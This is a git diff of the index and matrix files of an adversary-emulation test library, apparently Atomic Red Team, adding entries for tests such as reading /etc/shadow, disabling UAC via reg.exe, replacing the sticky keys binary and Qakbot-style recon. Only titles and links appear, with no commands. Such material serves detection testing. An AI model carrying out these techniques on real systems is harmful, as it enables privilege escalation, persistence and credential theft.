-371,6 +380,7 @@ discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall R discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt +discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt @@ -518,5 +528,6 @@ lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Man lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 4c2c3367..a26388e2 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -7,6 +7,7 @@ - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -31,6 +32,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -43,7 +45,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) @@ -137,6 +140,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] - Atomic Test #2: Set a SetUID flag on file [macos, linux] @@ -179,6 +183,7 @@ - Atomic Test #2: Add command to .bashrc [macos, linux] - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] @@ -225,7 +230,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) @@ -242,7 +248,8 @@ - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) @@ -326,6 +333,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - Atomic Test #1: Shortcut Modification [windows] - Atomic Test #2: Create shortcut to cmd in startup folders [windows] @@ -355,7 +363,9 @@ - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] # credential-access -- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) + - Atomic Test #1: Access /etc/shadow (Local) [linux] + - Atomic Test #2: Access /etc/passwd (Local) [linux] - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -475,6 +485,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] @@ -771,6 +782,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] - Atomic Test #2: Set a SetUID flag on file [macos, linux] @@ -831,7 +843,8 @@ - Atomic Test #1: Take ownership using takeown utility [windows] - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows] - Atomic Test #3: attrib - Remove read-only attribute [windows] - - Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] + - Atomic Test #4: attrib - hide file [windows] + - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] - [T1220 XSL Script Processing](../../T1220/T1220.md) - Atomic Test #1: MSXSL Bypass using local files [windows] - Atomic Test #2: MSXSL Bypass using remote files [windows] @@ -1025,6 +1038,7 @@ - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #5: List Open Egress Ports [windows] - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows] + - Atomic Test #7: Qakbot Recon [windows] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] @@ -1055,7 +1069,8 @@ - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md) - Atomic Test #1: Execute Commands [windows] - Atomic Test #2: Execute PowerShell script via Word DDE [windows] @@ -1338,7 +1353,8 @@ - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 371ac144..282b47c5 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -11,7 +11,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -65,7 +66,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -107,7 +109,9 @@ - T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # credential-access -- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) + - Atomic Test #1: Access /etc/shadow (Local) [linux] + - Atomic Test #2: Access /etc/passwd (Local) [linux] - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -470,7 +474,8 @@ - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index c87678bc..052b2df9 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -9,7 +9,7 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -70,7 +70,7 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -321,7 +321,7 @@ - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 52d124a7..d4e1343a 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -4,6 +4,7 @@ - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -26,6 +27,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -101,6 +103,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - Atomic Test #1: Shortcut Modification [windows] - Atomic Test #2: Create shortcut to cmd in startup folders [windows] @@ -142,6 +145,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] @@ -361,6 +365,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md) - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] @@ -398,7 +403,8 @@ - Atomic Test #1: Take ownership using takeown utility [windows] - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows] - Atomic Test #3: attrib - Remove read-only attribute [windows] - - Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] + - Atomic Test #4: attrib - hide file [windows] + - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] - [T1220 XSL Script Processing](../../T1220/T1220.md) - Atomic Test #1: MSXSL Bypass using local files [windows] - Atomic Test #2: MSXSL Bypass using remote files [windows] @@ -408,6 +414,7 @@ # persistence - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] @@ -459,7 +466,8 @@ - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) @@ -516,6 +524,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - Atomic Test #1: Shortcut Modification [windows] - Atomic Test #2: Create shortcut to cmd in startup folders [windows] @@ -676,6 +685,7 @@ - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #5: List Open Egress Ports [windows] - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows] + - Atomic Test #7: Qakbot Recon [windows] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] @@ -1017,7 +1027,8 @@ - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 88055df9..24b3b88f 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -1,7 +1,7 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 5571924c..5c681900 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -1,7 +1,7 @@ # All Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A 